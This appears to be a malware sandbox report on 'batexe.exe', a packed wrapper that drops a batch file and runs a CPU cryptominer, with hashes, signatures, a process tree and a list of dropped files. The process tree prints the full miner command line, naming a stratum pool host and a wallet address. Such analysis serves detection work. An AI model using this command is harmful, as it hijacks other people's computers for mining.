73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
304s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
24/02/2024, 04:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2424	b2e.exe
3372	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe
3372	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/716-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 716 wrote to memory of 2424	716	batexe.exe	74
PID 716 wrote to memory of 2424	716	batexe.exe	74
PID 716 wrote to memory of 2424	716	batexe.exe	74
PID 2424 wrote to memory of 1712	2424	b2e.exe	75
PID 2424 wrote to memory of 1712	2424	b2e.exe	75
PID 2424 wrote to memory of 1712	2424	b2e.exe	75
PID 1712 wrote to memory of 3372	1712	cmd.exe	78
PID 1712 wrote to memory of 3372	1712	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:716
- C:\Users\Admin\AppData\Local\Temp\1E9F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1E9F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1E9F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24AA.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1E9F.tmp\b2e.exe

Filesize
3.2MB

MD5
2b9dcbfc47166905adf0b57b6ff6024f

SHA1
6c221ea7ca56dc3ab0a4b0b7eba1f27d663b0906

SHA256
ea2d90479663136593c33e3050bcee3c6a80da575d032160402a4252b672de82

SHA512
95727ad46d62f892927b913674162cbf526cb6a74f84a0eec225365955e4b4646da57df09f5ee9be3d9ff5df3ca1e02af725518645351359fdde5ab9288f1696

Download Submit
C:\Users\Admin\AppData\Local\Temp\1E9F.tmp\b2e.exe

Filesize
3.7MB

MD5
2b2e433e5ac8514906795d90ba1f0403

SHA1
c00f83ecbb95474f9ebe6ddee39c5ffa3d02fbe9

SHA256
0eb818a914bee9727826750303ec3447b3a32704b55820d7c8b392cf07935311

SHA512
874ff4529b333604ef8dde2e799ede2719ffdbc27bbcc3e3872e59c8c88a3e29b71b4de1e6e94e4461e303400abda2a9e6d363f4b057f8d8b9e23e1f3006a037

Download Submit
C:\Users\Admin\AppData\Local\Temp\24AA.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
685KB

MD5
da02e8dc18ed778983de069b5a420027

SHA1
07f47eefba5bae43d23d8d69d95c98ddb0a3c85a

SHA256
dff1d6a2ba6fe52e28cd6ddc7b7747d543b0854750ffa269445aeb48008c4206

SHA512
ad455bf36ce8df0a906ccae702e0a7c1a220ea6d51a863e6d8bad63f070bd4f2c4048fbe16277a3a57530dc86d3fbf4d15e177abde45cc5bec4775ce64080664

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
493KB

MD5
f8439e17750266ede40b2d7e968e5064

SHA1
535ba60ab7400394f237aa383b77b3dc213e1350

SHA256
a82d88802170047fa0fb51156678364a193cdf223bd0a6c5160aee20969d38df

SHA512
f445384bedbc4b44afaf067d757ff603246b6a941869215210b6f7c544ac15f7415d256392dfd2f0f73de345dfa437693fa936fd5c06167f6cd8521e2dd8c5e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
523KB

MD5
004b69e71e45b476d4347d2e7c2ca6b7

SHA1
e3d72f747b0482828d960c2fe28fd7669130aa6b

SHA256
f4eccb4fc9d2c972af0fe07840beb754ae9e3123cab6fe61ff1a54980ef77104

SHA512
8796f00c87ec4934a23d351f93e2c8368f8abdf708188c640b39b558147163e065b4809d6356b8cc963a14aa2a2bae1e9bff255a8d96aaed4c0101eb3bb0a425

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
307KB

MD5
36236e225a52dee527703ebcf06c89e4

SHA1
d04f50fed0088ee11763cd4fd02fb0d9b375f3d3

SHA256
ecca20f8fd451688c1ed288c7959d4d50cba4db099819742265a82c3acefd4c2

SHA512
0adeec782017d170d2c12dd776db5f2f937534ef7728cfd8ece672ef91813018710d8582d9b5f523729c0b3c11fdd1471c4053cbda7af8918721f363badfe29f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
513KB

MD5
6652e3a38c7516d3a97fc23a27397b0a

SHA1
de39fcc138de8f5113abd039e1bc4cdba877a60c

SHA256
d2387373b40c93ae3b2eee66aca5e176b89a6691aff66c20842d397c1391ebbc

SHA512
a73e81136286682597bf6868ee46c971db2a89542de7a05b46c793bb61ce5953477281af376e2d12f0d862c943affcdf7b5e543a7b97e341320f5405bca12111

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
355KB

MD5
03986ee5ae73849eefeb0b89b2bf9568

SHA1
195449440346ab47cbeded281b9dcf22938ead30

SHA256
e0a550d7559f726a51b53fba98be8aa9eb7aead7955b29466a8d450e48e35e84

SHA512
7db01a38a5df204a91503716fa735f1905feb0dd89e03219b49aa8a9c80d4060b8ed86693c88f27a4e5c21325e634299b040f19bcc908b81b1ce17fe8cb1513a

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
516KB

MD5
b137b6d8746deb50cd348330573874d0

SHA1
8f2c79ceb7803df5316cc572c642bfc8314efcb7

SHA256
455cd202d98c5947a8d57d8045f102f10cf3fec3d6ef8d8f9b191998d5cfe5e8

SHA512
bda7ff89e8f26e813bcfa9bceb856c8e1995a17abf78dacd1f3749b1153cba32cef7e850c20163d547fd4984dedf9b38c376edbe541d807579ac0c99e8169fc5

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
665KB

MD5
f7162f699fea3660566b62ed41ccb60a

SHA1
2f8afb1a1afdfd3ef6e0a56dc27994f28d1ac762

SHA256
3cf6cf71bb3ebfff77caa653724e691dae0e030d1158f42648db9d6f71cff132

SHA512
2548c87d6184e02472c44071084fa82fec4eba8114b05f6b24ecbf450cdc3c0a74dd1256760049d865035853dbd9711185aad5be1b16447bbaf834268c632d4a

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
656KB

MD5
6103736c72f798a2abfa0a4463ac8247

SHA1
79237db1e9fc34b02875ef7d4c6693508bac1209

SHA256
eda971dc173fc9c1c7cf0f2bca57e3b0477502b4dd6a1c9c0cbce99ac6854dd1

SHA512
26a2f70584e41276576d87997848e80c181353bb28887623fd7c5384b0749d366c78c821c84df7566556d48b0a44e6b61e132a77aeebf210a7409081dfd535e7

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
541KB

MD5
2afbcab1de0056d5ec50af877abdfaa7

SHA1
670167e4ee2e06954623d3484b5a94e66eb2c8a1

SHA256
778b4e7c2effbee39fee57279f001e69c65a2c1794aacb8c83ce60df50368f17

SHA512
73749190010237e637ed9a04e60103d964fb78f0df3884020a511fd55e8fee20741d62c4d39916dbec8534182ee3fab0df6082f3e0bc40c5ce18638d22602bb7

Download Submit
memory/716-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2424-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2424-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3372-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3372-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3372-43-0x000000006E300000-0x000000006E398000-memory.dmp

Filesize
608KB

Download
memory/3372-44-0x0000000001080000-0x0000000002935000-memory.dmp

Filesize
24.7MB

Download
memory/3372-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3372-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download